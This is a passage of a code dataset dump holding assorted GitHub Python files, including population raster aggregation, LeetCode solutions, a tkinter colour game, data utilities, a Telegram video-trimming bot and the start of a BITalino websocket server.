of the rastercell\n df['weight'] = df['pop'] * df['m2_intersect'] / df['m2_raster']\n\n # sum up the weights of all rastercells in an area\n area_weight = df['weight'].groupby(level='area_id').sum().rename('total_weight')\n\n # calculate the share of population, a rastercell\n # should get from the total population\n df = df.merge(area_weight, left_on='area_id', right_index=True)\n df['share_cell_of_area'] = df['weight'] / df['total_weight']\n\n # sum up the weights of all areas in a cell\n cell_weight = df['weight'].groupby(level='id').sum().rename('total_weight_cell')\n\n df = df.merge(cell_weight, left_on='id', right_index=True)\n df['share_area_of_cell'] = df['weight'] / df['total_weight_cell']\n\n df2 = df[['rcp_id', 'share_area_of_cell', 'share_cell_of_area']]\\\n .reset_index()\\\n .rename(columns={'rcp_id': 'rastercellpop_id'})[\n ['area_id', 'rastercellpop_id', 'share_area_of_cell', 'share_cell_of_area']]\n\n ac = AreaCell.objects.filter(area__in=areas, rastercellpop__popraster=pop_raster)\n delete_chunks(ac, logger)\n\n model = AreaCell\n model_name = model._meta.object_name\n n_rows = len(df2)\n logger.debug(f'Schreibe insgesamt {n_rows:n} Einträge')\n stepsize = settings.STEPSIZE\n for i in np.arange(0, n_rows, stepsize, dtype=np.int64):\n chunk = df2.iloc[i:i + stepsize]\n n_inserted = len(chunk)\n write_template_df(chunk, model, logger,\n drop_constraints=drop_constraints,\n log_level=logging.DEBUG)\n logger.info(f'{i + n_inserted:n}/{n_rows:n} {model_name}-Einträgen geschrieben')\n\n\ndef aggregate_many(area_levels, populations, drop_constraints=False):\n\n manager = AreaPopulationAgeGender.copymanager\n with transaction.atomic():\n if drop_constraints:\n manager.drop_constraints()\n manager.drop_indexes()\n\n for i, area_level in 
enumerate(area_levels):\n for population in populations:\n aggregate_population(area_level, population,\n drop_constraints=False)\n entries = AreaPopulationAgeGender.objects.filter(\n area__area_level=area_level)\n summed_values = entries.values(\n 'population__year', 'area', 'population__prognosis')\\\n .annotate(Sum('value'))\n max_value = summed_values.aggregate(\n Max('value__sum'))['value__sum__max']\n area_level.max_population = max_value\n area_level.population_cache_dirty = False\n area_level.save()\n logger.info(f'Daten auf Gebietseinheit {area_level.name} aggregiert '\n f'{i + 1}/{len(area_levels)}')\n\n if drop_constraints:\n manager.restore_constraints()\n manager.restore_indexes()\n\n\ndef aggregate_population(area_level: AreaLevel, population: Population,\n drop_constraints=False):\n acells = AreaCell.objects.filter(area__area_level=area_level)\n\n rasterpop = RasterCellPopulationAgeGender.objects.filter(population=population)\n rcp = RasterCellPopulation.objects.all()\n\n q_acells, p_acells = acells.values(\n 'area_id', 'rastercellpop_id', 'share_area_of_cell').query.sql_with_params()\n q_pop, p_pop = rasterpop.values(\n 'population_id', 'cell_id', 'value', 'age_group_id', 'gender_id')\\\n .query.sql_with_params()\n q_rcp, p_rcp = rcp.values(\n 'id', 'cell_id').query.sql_with_params()\n\n query = f'''SELECT\n p.\"population_id\",\n ac.\"area_id\",\n p.\"age_group_id\",\n p.\"gender_id\",\n SUM(p.\"value\" * ac.\"share_area_of_cell\") AS \"value\"\n FROM\n ({q_acells}) AS ac,\n ({q_pop}) AS p,\n ({q_rcp}) AS rcp\n WHERE ac.\"rastercellpop_id\" = rcp.\"id\"\n AND p.\"cell_id\" = rcp.\"cell_id\"\n GROUP BY p.\"population_id\", ac.\"area_id\", p.\"age_group_id\", p.\"gender_id\"\n '''\n\n params = p_acells + p_pop + p_rcp\n\n columns = ['population_id', 'area_id', 'age_group_id', 'gender_id', 'value']\n\n with connection.cursor() as cursor:\n cursor.execute(query, params)\n rows = cursor.fetchall()\n df_areaagegender = pd.DataFrame(rows, columns=columns)\n\n ap_exist = AreaPopulationAgeGender.objects\\\n .filter(population=population, area__area_level=area_level)\n delete_chunks(ap_exist, logger)\n\n model = AreaPopulationAgeGender\n model_name = model._meta.object_name\n n_rows = len(df_areaagegender)\n logger.debug(f'Schreibe insgesamt {n_rows:n} Einträge')\n stepsize = settings.STEPSIZE\n for i in np.arange(0, n_rows, stepsize, dtype=np.int64):\n chunk = df_areaagegender.iloc[i:i + stepsize]\n n_inserted = len(chunk)\n write_template_df(chunk, model, logger,\n drop_constraints=drop_constraints,\n log_level=logging.DEBUG)\n logger.debug(f'{i + n_inserted:n}/{n_rows:n} {model_name}-Einträgen geschrieben')\n\n # validate_cache\n pop_arealevel, created = PopulationAreaLevel.objects.get_or_create(\n population=population,\n area_level=area_level)\n pop_arealevel.up_to_date = True\n pop_arealevel.save()\n","repo_name":"GertzGutscheRuemenapp/daviplan","sub_path":"datentool_backend/utils/pop_aggregation.py","file_name":"pop_aggregation.py","file_ext":"py","file_size_in_byte":11934,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"24271279194","text":"class Solution:\n def numUniqueEmails(self, emails: List[str]) -> int:\n unique_emails = set()\n for email in emails:\n local, domain = email.split('@')\n local = local.replace('.','')\n if '+' in local:\n local = local.split('+')[0]\n \n email = local+\"@\"+domain\n unique_emails.add(email)\n return 
len(unique_emails)","repo_name":"vladanills/leetcode_tasks","sub_path":"0929-unique-email-addresses/0929-unique-email-addresses.py","file_name":"0929-unique-email-addresses.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35728015938","text":"import pandas as pd\nfrom collections import Counter\nfrom fuzzywuzzy import fuzz\nimport re\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\n\ndata_Sto = pd.DataFrame()\ndata_Flu = pd.DataFrame()\n\n# read in the data files\ndata1 = pd.read_csv('day_data/' + str(1) + '/' + str(1) + '_StomachacheKeyWords.csv', index_col=False)\ndata2 = pd.read_csv('day_data/' + str(1) + '/' + str(1) + '_FluKeyWords.csv', index_col=False)\ndata_Sto['Words'] = data1.iloc[:, 0]\ndata_Flu['Words'] = data2.iloc[:, 0]\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n# collect the keyword information for every day\nfor row in range(21):\n    if row == 20:\n        row = 29\n\n    print(row+1)\n\n    # read in the data files\n    data1 = pd.read_csv('day_data/'+str(row+1)+'/'+str(row+1)+'_StomachacheKeyWords.csv', index_col=False)\n    data2 = pd.read_csv('day_data/'+str(row+1)+'/'+str(row+1)+'_FluKeyWords.csv', index_col=False)\n\n    data_Sto[str(row+1)] = data1.iloc[:, 1]\n    data_Flu[str(row+1)] = data2.iloc[:, 1]\n\nprint(data_Sto)\nprint(data_Flu)\ndata_Sto.to_csv('StoDayCount.csv', index=False)\ndata_Flu.to_csv('FluDayCount.csv', index=False)","repo_name":"YuyiYuanYYY/Flu-Message","sub_path":"Python/PatientGet.py","file_name":"PatientGet.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74578537073","text":"import select\n\n# note: select() always reports regular files as readable, so this\n# effectively busy-polls the file instead of waiting for new data\nf = open('a', 'r')\nwhile True:\n    try:\n        rs, ws, es = select.select([f, ], [], [])\n        for i in rs:\n            buf = i.read()\n            print(buf, end='')\n    except KeyboardInterrupt:\n        f.close()\n        break","repo_name":"City-Zero/study_higher_python3","sub_path":"tail/tail_select.py","file_name":"tail_select.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"74165027634","text":"class Solution:\n    def longestPalindrome(self, s: str) -> str:\n        # Initialize variables to store the longest palindrome and its length\n        res = \"\"\n        resLen = 0\n        length = 0\n        \n        # Loop through the characters in the input string 's'\n        for i in range(len(s)):\n            # Check for palindromes with odd length (centered at 'i')\n            l = r = i\n            while l >= 0 and r < len(s) and s[l] == s[r]:\n                length = r - l + 1  # Calculate the length of the current palindrome\n                if resLen < length:\n                    resLen = length\n                    res = s[l:r + 1]  # Update the longest palindrome substring\n                l -= 1\n                r += 1\n            \n            # Check for palindromes with even length (centered between 'i' and 'i+1')\n            l, r = i, i + 1\n            while l >= 0 and r < len(s) and s[l] == s[r]:\n                length = r - l + 1  # Calculate the length of the current palindrome\n                if resLen < length:\n                    resLen = length\n                    res = s[l:r + 1]  # Update the longest palindrome substring\n                l -= 1\n                r += 1\n\n        return res  # Return the longest palindrome found\n","repo_name":"codingaslu/Leetcode_problems","sub_path":"0005-longest-palindromic-substring/0005-longest-palindromic-substring.py","file_name":"0005-longest-palindromic-substring.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"31398243044","text":"import numpy as np\nimport pickle\nimport joblib\nfrom logger import logger\n\n\nclass Model:\n    @staticmethod\n    def carrega_modelo(path, scaler=None):\n        \"\"\"Load the model one way or the other, depending on whether the path ends in .pkl or .joblib\"\"\"\n\n        if path.endswith(\".pkl\"):\n            model = pickle.load(open(path, \"rb\"))\n        elif path.endswith(\".joblib\"):\n            model = joblib.load(path)\n        else:\n            raise Exception(\"Unsupported file format\")\n\n        if scaler is not None:\n            model.scaler = scaler\n\n        return model\n\n    @staticmethod\n    def preditor(model, form):\n        \"\"\"Predict the diagnosis for a person using the trained model\"\"\"\n        X_input = np.array(\n            [\n                form.person_id,\n                form.gender,\n                form.age,\n                form.sleep_duration,\n                form.quality_sleep,\n                form.activity_level,\n                form.stress_level,\n                form.bmi_category,\n                form.blood_pressure,\n                form.heart_rate,\n                form.daily_steps,\n            ]\n        )\n\n        # reshape so the model understands a single sample is being passed\n        X_input = X_input.reshape(1, -1)\n\n        # standardize the input using the scaler that was fitted on X_train\n        X_input_scaled = model.scaler.transform(X_input)\n\n        # add an extra dimension to match the shape the model expects\n        diagnosis = model.predict(X_input_scaled.reshape(1, -1))\n\n        logger.info(f\"================ diagnosis[0] ============ : '{diagnosis[0]}'\")\n        return int(diagnosis[0])\n","repo_name":"paularmelo/mvp_qualidade_seguran-a_si","sub_path":"APLICAÇÃO FULL STACK/mvp_sleep_health/api/model/modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70379730353","text":"import os\nimport numpy as np\nimport cv2\nfrom prefetch_generator import background\nimport concurrent.futures\nimport itertools\nimport threading\nfrom keras.preprocessing.image import ImageDataGenerator as Gen\ndef Load_bgr(category):\n    mono_list = []\n    red_list = []\n    blue_list = []\n    green_list = []\n    path = \"train_\" + category\n\n    for file in os.listdir(path):\n        if file != \".DS_Store\":\n            filepath = path + \"/\" + file\n            src = cv2.imread(filepath, 1)\n            src = cv2.resize(src, (256, 256))\n            #bgr = np.array(cv2.split(src))\n            blue_list.append(np.ravel(src[:,:,0] / 255.0))\n            green_list.append(np.ravel(src[:,:,1] / 255.0))\n            red_list.append(np.ravel(src[:,:,2] / 255.0))\n            gry = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n            mono_list.append(np.ravel(gry / 255.0))\n\n    blue_list = np.array(blue_list)\n    green_list = np.array(green_list)\n    red_list = np.array(red_list)\n    mono_list = np.array(mono_list)\n\n\n    return blue_list, green_list, red_list, mono_list\n\ndef Load_hsv(category, batch_size, hs):\n    path = \"train_\" + category\n    mono_list = []\n    y_list = []\n\n\n    datagen = Gen(horizontal_flip=True,\n                  vertical_flip=True,\n                  
rotation_range=180,\n width_shift_range=0.2,\n height_shift_range=0.2,\n zoom_range=0.3)\n imggen = datagen.flow_from_directory(directory='./', classes=[path], batch_size=1, class_mode=None)\n\n for batch in imggen:\n img = np.flip(batch[0], axis=2)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n gry = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if hs == 'h':\n y_list.append(np.ravel(hsv[:,:,0] / 360.0))\n elif hs == 's':\n y_list.append(np.ravel(hsv[:,:,1]))\n mono_list.append(np.ravel(gry / 255.0))\n if len(y_list) == batch_size:\n y_list = np.array(y_list)\n mono_list = np.array(mono_list)\n yield (mono_list, y_list)\n mono_list = []\n y_list = []\n\n\n@background(max_prefetch=320)\ndef Load_cov(category, batch_size, hs):\n path = \"train_\" + category\n\n datagen = Gen(horizontal_flip=True,\n vertical_flip=True,\n rotation_range=180,\n width_shift_range=0.2,\n height_shift_range=0.2,\n zoom_range=0.3)\n imggen = datagen.flow_from_directory(directory='./', classes=[path], batch_size=1, class_mode=None)\n\n\n executor = concurrent.futures.ThreadPoolExecutor(32)\n while True:\n futures = [executor.submit(transform_img, img, hs) for img in itertools.islice(imggen,batch_size)]\n x_list = np.empty((batch_size, 32768))\n y_list = np.empty((batch_size, 16384))\n for i, future in enumerate(futures):\n x, y = future.result()\n x_list[i] = x\n y_list[i] = y\n yield (x_list, y_list)\n\n\ndef transform_img(img, hs):\n img = np.flip(img[0], axis=2)\n img = cv2.resize(img,(128, 128))\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n gry = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if hs == 'h':\n y = np.ravel(hsv[:,:,0] / 360.0)\n elif hs == 's':\n y = np.ravel(hsv[:,:,1])\n gry_cov = np.cov(gry) / np.max(np.absolute(np.cov(gry)))\n x = np.ravel(np.append(gry/255.0, gry_cov))\n return x, y","repo_name":"L2E0/research","sub_path":"load_train_data.py","file_name":"load_train_data.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39238196941","text":"def solution(id_pw, db):\n answer = ''\n result = 0\n for i in range(len(db)):\n if db[i][0] == id_pw[0]:\n if db[i][1]==id_pw[1]:\n answer = \"login\"\n return answer\n else:\n answer = \"wrong pw\"\n return answer\n \n answer = \"fail\"\n return answer","repo_name":"min1018/algorithm-study-2022-2","sub_path":"1주차/로그인_성공.py","file_name":"로그인_성공.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"477892852","text":"from tkinter import*\r\nimport pygame\r\nfrom tkinter import messagebox\r\nimport random\r\npygame.mixer.init()\r\nroot=Tk()\r\nroot.geometry('575x200')\r\npoint=0\r\npoint_data=IntVar()\r\ntime_left_data=IntVar()\r\ntime_left=60\r\ncheck=True\r\ntime_left_lab=Label(root,text=f'Time Left: {time_left}',textvariable=time_left_data,font=('Arail',20,'bold'))\r\npoint_label=Label(root,text=f'Point: {point}',textvariable=point_data,font=('Arail',20,'bold'))\r\ntime_left_data.set(f'Time Left: {time_left}')\r\npoint_data.set(f'Point: {point}')\r\ncolours=['Blue','Black','Red','Pink','Yellow','Grey','White','Brown','Cyan','Green','Purple',]\r\ndef time_left_func():\r\n\tglobal time_left\r\n\tglobal check\r\n\tglobal point\r\n\tcheck=False\r\n\ttime_left-=1\r\n\tid=root.after(1000,time_left_func)\r\n\ttime_left_data.set(f'Time Left: {time_left}')\r\n\tif time_left==0:\r\n\t\troot.after_cancel(id)\r\n\t\tQUEs=messagebox.askquestion('QUESTION',f'Times Up!! 
Your Point Are {point} Do You Want To Play Again?')\r\n\t\tif QUEs=='yes':\r\n\t\t\tinput_.delete(0,END)\r\n\t\t\ttime_left+=60\r\n\t\t\ttime_left_data.set(f'Time Left: {time_left}')\r\n\t\t\troot.after(1000,time_left_func)\r\n\t\t\tpoint-=point\r\n\t\t\tpoint_data.set(f'Point: {point}')\r\n\t\tif QUEs=='no':\r\n\t\t\troot.unbind(\"<Return>\")\r\n\t\t\troot.destroy()\r\ndef add_point(event):\r\n\tglobal point\r\n\tglobal check\r\n\tif (colour_label['fg']).lower()==input_.get().lower():\r\n\t\tpoint+=1\r\n\t\tpoint_data.set(f'Point: {point}')\r\n\t\tpygame.mixer.music.load('Good Job!.mp3')\r\n\t\tpygame.mixer.music.play()\r\n\tif (colour_label['fg']).lower()!=input_.get().lower():\r\n\t\tpygame.mixer.music.load('bruh.mp3')\r\n\t\tpygame.mixer.music.play()\r\n\tguide.place(x=4393)\r\n\ttime_left_lab.place(x=375,y=35)\r\n\tpoint_label.place(x=415,y=75)\r\n\tcolour_label.config(text=random.choice(colours))\r\n\tcolour_label.config(fg=random.choice(colours))\r\n\tif check==True:\r\n\t\ttime_left_func()\r\n\tinput_.delete(0,END)\r\nroot.title('Colour Game!')\r\nheAd=Label(root,text='Tip:Type in the colour of the words and do not type the text',font=('Arail',15,'bold')).pack()\r\nguide=Label(root,text='Press Enter To Start The Game!!',font=('Arail',15,'bold'))\r\nguide.pack()\r\ninput_=Entry(root,font=('Arail',17,'bold'),width=20)\r\ninput_.place(x=125,y=160)\r\ncolour_label=Label(root,text='',font=('Arial Rounded MT Bold',55,'bold'))\r\ncolour_label.place(x=136,y=45)\r\nroot.bind('<Return>',add_point)\r\nmainloop()\r\n","repo_name":"RishiRatanPandey/colour-game","sub_path":"colour game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70134445553","text":"import copy\n\nimport math\nimport numpy\nfrom sklearn.decomposition import PCA\n\n\ndef sqrt_quadratic_sum(list):\n    \"\"\"\n    Square the measured components, sum them, and take the square root\\n\n    :param list: a list of xyz triples: [[x1,y1,z1],[x2,y2,z2],...]\n    :return: [sqrt(x1^2 + y1^2 + z1^2), sqrt(x2^2 + y2^2 + z2^2), ...]\n    \"\"\"\n    result = []\n    for child_list in list:\n        result.append(math.sqrt(child_list[0] ** 2 + child_list[1] ** 2 + child_list[2] ** 2))\n    return result\n\n\ndef fill_list(list, length, num=0):\n    \"\"\"\n    Pad list with num up to length (or trim it down to length)\n    :param list: the list to fill\n    :param num: the fill value\n    :param length: the target length\n    \"\"\"\n    if len(list) >= length:\n        origin_list = copy.deepcopy(list)\n        list.clear()\n        for i in range(length):\n            list.append(origin_list[i])\n\n    else:\n        for i in range(length - len(list)):\n            list.append(num)\n\n\ndef zoom_list(data, length, value):\n    \"\"\"\n    Compress a list\n    :param list:\n    :param length: maximum length\n    :param value: maximum value\n    \"\"\"\n\n    list = data\n\n    max_value = list[numpy.argmax(list)]\n\n    if type(data) is numpy.ndarray:\n        list = data.tolist()\n\n    data_len = len(list)\n\n    if max_value > value:\n        zoom = value / max_value\n        print(zoom)\n        for i in range(len(list)):\n            list[i] = list[i] * zoom\n\n    if data_len <= length:\n        return list\n\n    diff = data_len - length\n    step = int(data_len / diff)\n\n    del_num = 0\n    for i, val in enumerate(list):\n\n        if i % (step + 1) == 0:\n            del list[i - del_num]\n            del_num += 1\n    return list\n\n\ndef cut_invalid(data, value):\n    \"\"\"\n    Strip every leading and trailing entry of data that is below value.\n    If the list starts above value, detection only begins once a value drops below the threshold.\n    :param data:\n    :param value:\n    \"\"\"\n    if len(data) == 0:\n        return []\n\n    index = 0\n    index_reverse = len(data)\n\n    start = True\n\n    if data[0] > value:\n        start = False\n\n    for i in range(len(data)):\n        if start:\n            if data[i] > value:\n                index = i\n                break\n        
else:\n            if data[i] < value:\n                start = True\n\n    for r in list(range(0, len(data)))[::-1]:\n        if data[r] > value:\n            index_reverse = r\n            break\n\n    return data[index:index_reverse]\n\n\ndef pca(arr, dimention=1) -> numpy.ndarray:\n    result = PCA(n_components=dimention)\n    new_arr = result.fit_transform(arr)\n    data = numpy.reshape(new_arr, len(new_arr))\n    return data\n\n\ndef paa(arr, size) -> numpy.ndarray:\n    length = len(arr)\n    if length == size:\n        return arr\n    else:\n        if length % size == 0:\n            return numpy.mean(numpy.hsplit(arr, size), axis=1)\n        else:\n            res = numpy.zeros(size)\n            for i in range(length * size):\n                idx = int(i / length)\n                pos = int(i / size)\n                res[idx] = res[idx] + arr[pos]\n            for i in range(0, size):\n                res[i] = res[i] / length\n            return res\n\n\ndef vector_cos(v1, v2):\n    return v1.dot(v2) / (numpy.sqrt(v1.dot(v1)) * numpy.sqrt(v2.dot(v2)))\n\n\n# Remove the values in data that are larger than max or smaller than min\ndef delete_max_min(data, max, min):\n    result = []\n    for i, d in enumerate(data):\n        if max > data[i] > min:\n            result.append(data[i])\n    return numpy.array(result)\n","repo_name":"SailFlorve/TiaoZhanBeiProject","sub_path":"sail/algorithm/data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27433812504","text":"\"\"\"\n167. Two Sum II - Input Array Is Sorted\nhttps://leetcode.com/problems/two-sum-ii-input-array-is-sorted/\n\nUse l, r pointers at 0 and len(n)-1; if the sum overshoots, decrease r, and if it falls short, increase l.\nNote that it asks for (1-indexed), meaning index 0 becomes index 1, so add 1 to each pointer at the end\n\ntime O(n): we traverse the array once.\nspace O(1): we use constant space, since we only store two pointers and variables\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution2:\n    def twoSum(self, numbers: List[int], target: int) -> List[int]:\n        left, right = 0, len(numbers) - 1\n\n        while left < right:\n            current_sum = numbers[left] + numbers[right]\n\n            if current_sum == target:\n                return [left + 1, right + 1]\n            elif current_sum < target:\n                left += 1\n            else:\n                right -= 1\n        return []\n\n\nclass Solution:\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n        l, r = 0, len(nums) - 1\n\n        while l < r:\n            sum = nums[l] + nums[r]\n            if sum == target:\n                return [l + 1, r + 1]\n            elif sum > target:\n                r -= 1\n            else:\n                l += 1\n\n        return []\n\n\nif __name__ == \"__main__\":\n    solution = Solution()\n\n    print(solution.twoSum([2, 7, 11, 15], 9))  # Should print [1, 2]\n    print(solution.twoSum([2, 3, 4], 6))  # Should print [1, 3]\n    print(solution.twoSum([-1, 0], -1))  # Should print [1, 2]\n","repo_name":"scyanh/needcode","sub_path":"leetcode150/2_two pointers/3_Two Sum II - Input Array Is Sorted/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"42686187980","text":"import os, datetime, glob, subprocess, json\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton, Message\nimport keyboard as kb\nimport pygetwindow as gw\n\nwin = gw.getActiveWindow()\n\nBOT_TOKEN = \" \"\nAPI_ID = \" \"\nAPI_HASH = \" \"\n\nBot = Client(\n    \":memory:\",\n    bot_token = BOT_TOKEN,\n    api_id = API_ID,\n    api_hash = API_HASH\n)\n\nrefresh_button = [\n    InlineKeyboardButton(\n        text='Refresh List',\n        callback_data='refresh'\n    )\n]\n\nmsgid = 0\nchatid = 
0\n\n@Bot.on_message(filters.command(['resume']) & filters.private)\nasync def edame(client, message):\n win.activate()\n kb.press_and_release('enter')\n await message.reply('resumed.')\n\n@Bot.on_message(filters.command(['stop']) & filters.private)\nasync def estop(client, message):\n win.activate()\n kb.press_and_release('pause')\n await message.reply('stoped. to resume send /resume')\n\n@Bot.on_message(filters.command(['cancel']) & filters.private)\nasync def kansel(client, message):\n await message.reply('canceled.')\n exit(0)\n\n@Bot.on_message(filters.text & ~filters.regex('/previous'))\nasync def start(bot, m):\n keyboard = []\n keyboard.append(refresh_button)\n try:\n for file in glob.glob('C:/dlmacvin/1aa/*'):\n if file.endswith(('.ts', '.mp4', '.mkv')):\n keyboard.append(\n [\n InlineKeyboardButton(\n text=file.rsplit('/', 1)[1].replace('1aa\\\\', ''),\n callback_data=file.rsplit('/', 1)[1].replace('1aa\\\\', '')\n )\n ]\n )\n except Exception as e:\n print(e)\n return\n keyboard.append(refresh_button)\n #await bot.send_message(chat_id=id, text=\"Which one?\", reply_markup=InlineKeyboardMarkup(keyboard))\n await m.reply_text(text=\"Which one?\", reply_markup=InlineKeyboardMarkup(keyboard))\n\n\n@Bot.on_callback_query()\nasync def callback(bot, update):\n global chatid, msgid\n if update.data == \"refresh\":\n keyboard = []\n keyboard.append(refresh_button)\n try:\n for file in glob.glob('C:/dlmacvin/1aa/*'):\n if file.endswith(('.ts', '.mp4', '.mkv')):\n keyboard.append(\n [\n InlineKeyboardButton(\n text=file.rsplit('/', 1)[1].replace('1aa\\\\', ''),\n callback_data=file.rsplit('/', 1)[1].replace('1aa\\\\', '')\n )\n ]\n )\n except Exception as e:\n print(e)\n return\n keyboard.append(refresh_button)\n try:\n await update.message.edit(text=f\"Which one of these {len(keyboard)} videos?\", reply_markup=InlineKeyboardMarkup(keyboard))\n except:\n await update.message.reply_text(\"error!! Send /start\")\n return\n try:\n name = update.data\n input = 'C:/dlmacvin/1aa/' + name\n process_msg = await update.message.reply_text('Processing..\\nFor cancel send /cancel\\nFor stop send /stop')\n ext = '.' + name.rsplit('.', 1)[1]\n out = 'C:/dlmacvin/1aa/videos/'+name\n os.system(f'''ffmpeg -ss 00:00:00 -i \"{input}\" -to 00:20:00 -c copy -y \"{out}\"''')\n await process_msg.delete()\n if chatid == 0:\n msg = await update.message.reply_text('Done! ' + out)\n msgid = msg.message_id\n elif chatid != 0:\n try:\n await bot.edit_message_text(update.message.chat.id, msgid, 'Done! 
' + out)\n except:\n await bot.edit_message_text(update.message.chat.id, msgid, 'تمام')\n chatid = update.message.from_user.id\n\n except:\n pass\n\n\n\nBot.run()\n","repo_name":"Soebb/cut20min","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1447729313","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions\r\nIntro to Python Workshop\r\n\r\n\"\"\"\r\n# Functions are reusable blocks of code that we call when needed\r\n# You should call them whatever you like, just don't use one of Python's \r\n# built-in functions (such as input(), type(), float(), etc.)\r\n# Functions are called using the the def() reserved word\r\n\r\n# Structure: function name, arguments, parameters, return\r\n# an argument is a value passed into the function as its input when called\r\n# a parameter is a variable used in function defintion\r\n# 'return' - returns a value from executing the function and \"sends back\" result\r\n\r\n# Here is a simple function, which prints three lines of truth\r\nprint ('Lithium')\r\ndef print_lyrics():\r\n print (\"I'm so happy because today\")\r\n print (\"I've found my friends\")\r\n print (\"They're in my head\") \r\nprint_lyrics()\r\nprint ('Yeah')\r\n\r\n# Note some things about the architecture in the statement above\r\n# You need the def statement, a name, and then parameters (as needed)\r\n# You often will want to return values for these, as you're often passing\r\n# them off to be used later. A more relevant example below\r\n\r\nx = [10,15,3,4,11,15]\r\ny = [2,20,3,6,7,22]\r\n\r\ndef get_means(xvals,yvals):\r\n xcoords = sum(xvals)/len(xvals)\r\n ycoords = sum(yvals)/len(yvals)\r\n return xcoords,ycoords\r\n\r\nvals = get_means(x,y)\r\nprint ('The mean center is: ' '%.1f' % vals[0],',',vals[1])\r\n\r\n\r\n# Standard Distance Function \r\n# Another example of calling a library that isn't already loaded\r\nimport math\r\n\r\ndef getsd(xvals,yvals):\r\n meanx = sum(xvals)/len(xvals)\r\n meany = sum(yvals)/len(yvals)\r\n evalx = []\r\n evaly = []\r\n for i in xvals:\r\n xl = (i-meanx)**2\r\n evalx.append(xl)\r\n for i in yvals:\r\n yl = (i-meany)**2\r\n evaly.append(yl)\r\n z = math.sqrt((((sum(evalx)/len(evalx)) + (sum(evaly)/len(evaly)))))\r\n return z\r\n\r\nsd = getsd(x,y)\r\nprint ('The standard distance is: ' '%.2f' % sd)\r\n ","repo_name":"moni-roy/GRAD-778","sub_path":"Intro To Python/Course Materials/Module 7 - Functions/7_Functions.py","file_name":"7_Functions.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"304909711","text":"from tornado import websocket, web, ioloop\r\nimport thread\r\nimport json\r\nimport signal\r\nimport sys\r\nimport numpy\r\nimport time\r\nimport sys, traceback, os\r\nfrom bitalino import *\r\nfrom os.path import expanduser\r\nimport threading\r\n\r\ncl = []\r\ntflag = True\r\n\r\ndef tostring(data):\r\n \"\"\"\r\n :param data: object to be converted into a JSON-compatible `str`\r\n :type data: any\r\n :return: JSON-compatible `str` version of `data`\r\n \r\n Converts `data` from its native data type to a JSON-compatible `str`.\r\n \"\"\"\r\n dtype=type(data).__name__\r\n if dtype=='ndarray':\r\n if numpy.shape(data)!=(): data=data.tolist() # data=list(data)\r\n else: data='\"'+data.tostring()+'\"'\r\n elif dtype=='dict' or dtype=='tuple':\r\n try: data=json.dumps(data)\r\n except: pass\r\n elif 
dtype=='NoneType':\r\n data=''\r\n elif dtype=='str' or dtype=='unicode':\r\n data=json.dumps(data)\r\n \r\n return str(data)\r\n\r\n\r\nclass SocketHandler(websocket.WebSocketHandler):\r\n def check_origin(self, origin):\r\n return True\r\n\r\n def open(self):\r\n global tflag\r\n if self not in cl:\r\n cl.append(self)\r\n print(\"CONNECTED\")\r\n tflag = True\r\n\r\n def on_message(self, message):\r\n self.write_message(u\"You said: \" + message)\r\n\r\n def on_close(self):\r\n if self in cl:\r\n cl.remove(self)\r\n print(\"DISCONNECTED\")\r\n\r\ndef signal_handler(signal, frame):\r\n print('TERMINATED')\r\n sys.exit(0)\r\n\r\ndef BITalino_handler(mac_addr, ch_mask, srate, labels):\r\n #labels = [\"'nSeq'\", \"'I1'\", \"'I2'\", \"'O1'\", \"'O2'\", \"'A1'\", \"'A2'\", \"'A3'\", \"'A4'\", \"'A5'\", \"'A6'\"]\r\n ch_mask = numpy.array(ch_mask)-1\r\n try:\r\n print(mac_addr)\r\n device=BITalino(mac_addr)\r\n print(ch_mask)\r\n print(srate)\r\n device.start(srate, ch_mask)\r\n cols = numpy.arange(len(ch_mask)+5)\r\n while (1):\r\n data=device.read(250)\r\n res = \"{\"\r\n for i in cols:\r\n idx = i\r\n if (i>4): idx=ch_mask[i-5]+5\r\n res += 